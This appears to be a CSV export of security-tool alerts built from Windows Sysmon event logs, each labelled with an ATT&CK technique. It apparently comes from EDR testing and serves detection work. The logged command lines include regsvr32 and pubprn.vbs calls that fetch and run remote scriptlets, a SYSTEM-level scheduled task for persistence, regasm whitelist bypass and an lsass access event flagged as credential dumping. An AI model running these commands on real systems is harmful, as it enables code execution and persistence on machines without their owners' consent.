Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-6638-5D3F-0000-00103DA88900 + 1652 + C:\Windows\System32\cmd.exe + cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4931 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:44.622 + 747F3D96-6638-5D3F-0000-001067BA8900 + 4288 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-6638-5D3F-0000-00103DA88900 + 1652 + 
C:\Windows\System32\cmd.exe + cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1557854258.250959,2019-05-14T21:17:38.250959+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 32009 + + + + + Microsoft-Windows-Sysmon/Operational + alice.insecurebank.local + + + + + + 2019-05-14 17:17:24.660 + ECAD0485-F2EC-5CDA-0000-0010F1631500 + 4092 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + insecurebank\Administrator + tcp + true + false + 10.59.4.20 + alice.insecurebank.local + 49584 + + false + 10.59.4.11 + DC1 + 389 + ldap + +",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1557854246.738627,2019-05-14T21:17:26.738627+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 32008 + + + + + Microsoft-Windows-Sysmon/Operational + alice.insecurebank.local + + + + + + 2019-05-14 17:17:24.597 + ECAD0485-F2EC-5CDA-0000-0010F1631500 + 4092 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + insecurebank\Administrator + tcp + true + false + 10.59.4.20 + alice.insecurebank.local + 49583 + + false + 10.59.4.11 + DC1 + 389 + ldap + +",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with 
Regsvr32,rundll32,certutil or scrobj ",1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4929 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:44.204 + 747F3D96-6638-5D3F-0000-00103DA88900 + 1652 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4929 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:44.204 + 747F3D96-6638-5D3F-0000-00103DA88900 + 1652 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating 
System + Microsoft Corporation + cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1587853142.072006,2020-04-26T02:19:02.072006+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 27334 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-04-25 22:19:01.724 + 747F3D96-B755-5EA4-0000-0010D06E2500 + 4484 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-3384-5EA5-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 596 + ? + ? 
+ +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028513.459611,2019-03-20T00:48:33.459611+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966368 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:48:33.279 + 365ABB72-55A1-5C91-0000-0010AB8C0700 + 2112 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436019.372599,2019-07-30T01:33:39.372599+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4926 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:39.223 + 747F3D96-6633-5D3F-0000-001092628900 + 5056 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 
747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436019.358048,2019-07-30T01:33:39.358048+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4925 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:39.152 + 747F3D96-6633-5D3F-0000-001051608900 + 4092 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436085.311645,2019-07-30T01:34:45.311645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 
script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5004 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:45.198 + 747F3D96-6675-5D3F-0000-0010AA498F00 + 4184 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1564436081.793311,2019-07-30T01:34:41.793311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5002 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence - Scheduled Task Management + 2019-07-29 21:34:40.755 + 747F3D96-6670-5D3F-0000-0010F9148F00 + 7076 + C:\Windows\System32\schtasks.exe + 10.0.17763.1 (WinBuild.160101.0800) + Task Scheduler Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 
747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 + 747F3D96-6670-5D3F-0000-001099048F00 + 2916 + C:\Windows\System32\cmd.exe + cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553028158.70443,2019-03-20T00:42:38.704430+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966330 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:42:38.043 + 365ABB72-543E-5C91-0000-001009C90300 + 3068 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" + C:\Windows\system32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-543D-5C91-0000-001099A60300 + 2984 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1003] Credential Dumping - Process Access,1556608980.899263,2019-04-30T11:23:00.899263+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10," + + + + + 10 + 3 + 4 + 10 + 0 + 0x8000000000000000 + + + 8341 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 07:23:00.883 + 365ABB72-F7C9-5CC7-0000-0010BF010E00 + 3772 + 1088 + D:\m.exe + 365ABB72-F6A1-5CC7-0000-001072590000 + 492 + C:\Windows\system32\lsass.exe + 0x1410 + 
C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\system32\KERNELBASE.dll+8185|UNKNOWN(01770343)|UNKNOWN(0176FF9D)|UNKNOWN(0176F8EC)|UNKNOWN(00397486)|UNKNOWN(003973A0)|UNKNOWN(003978A3)|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436080.38552,2019-07-30T01:34:40.385520+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5000 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:40.243 + 747F3D96-6670-5D3F-0000-001099048F00 + 2916 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4998 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:36.528 + 
747F3D96-666C-5D3F-0000-00104BB78E00 + 3872 + C:\Windows\System32\calc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + calc + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 + 747F3D96-6642-5D3F-0000-001044A68A00 + 2996 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 27803 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-04-25 22:19:27.149 + 747F3D96-B76F-5EA4-0000-0010624D0600 + 5840 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-B767-5EA4-0000-00209BD30100 + 0x1d39b + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-B769-5EA4-0000-001000800300 + 4472 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances 
of an Active Script Event Consumer - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4998 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:36.528 + 747F3D96-666C-5D3F-0000-00104BB78E00 + 3872 + C:\Windows\System32\calc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + calc + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 + 747F3D96-6642-5D3F-0000-001044A68A00 + 2996 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 27803 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-04-25 22:19:27.149 + 747F3D96-B76F-5EA4-0000-0010624D0600 + 5840 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-B767-5EA4-0000-00209BD30100 + 0x1d39b + 1 + Medium + 
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-B769-5EA4-0000-001000800300 + 4472 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 27803 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-04-25 22:19:27.149 + 747F3D96-B76F-5EA4-0000-0010624D0600 + 5840 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-B767-5EA4-0000-00209BD30100 + 0x1d39b + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-B769-5EA4-0000-001000800300 + 4472 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c winrm i c 
wmicimv2/Win32_Process @{CommandLine="calc"}) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4994 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.763 + 747F3D96-666B-5D3F-0000-0010EF858E00 + 264 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-666B-5D3F-0000-001033648E00 + 1580 + C:\Windows\System32\cmd.exe + cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cscript.exe ) through command line ( cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4994 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.763 + 747F3D96-666B-5D3F-0000-0010EF858E00 + 264 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + 
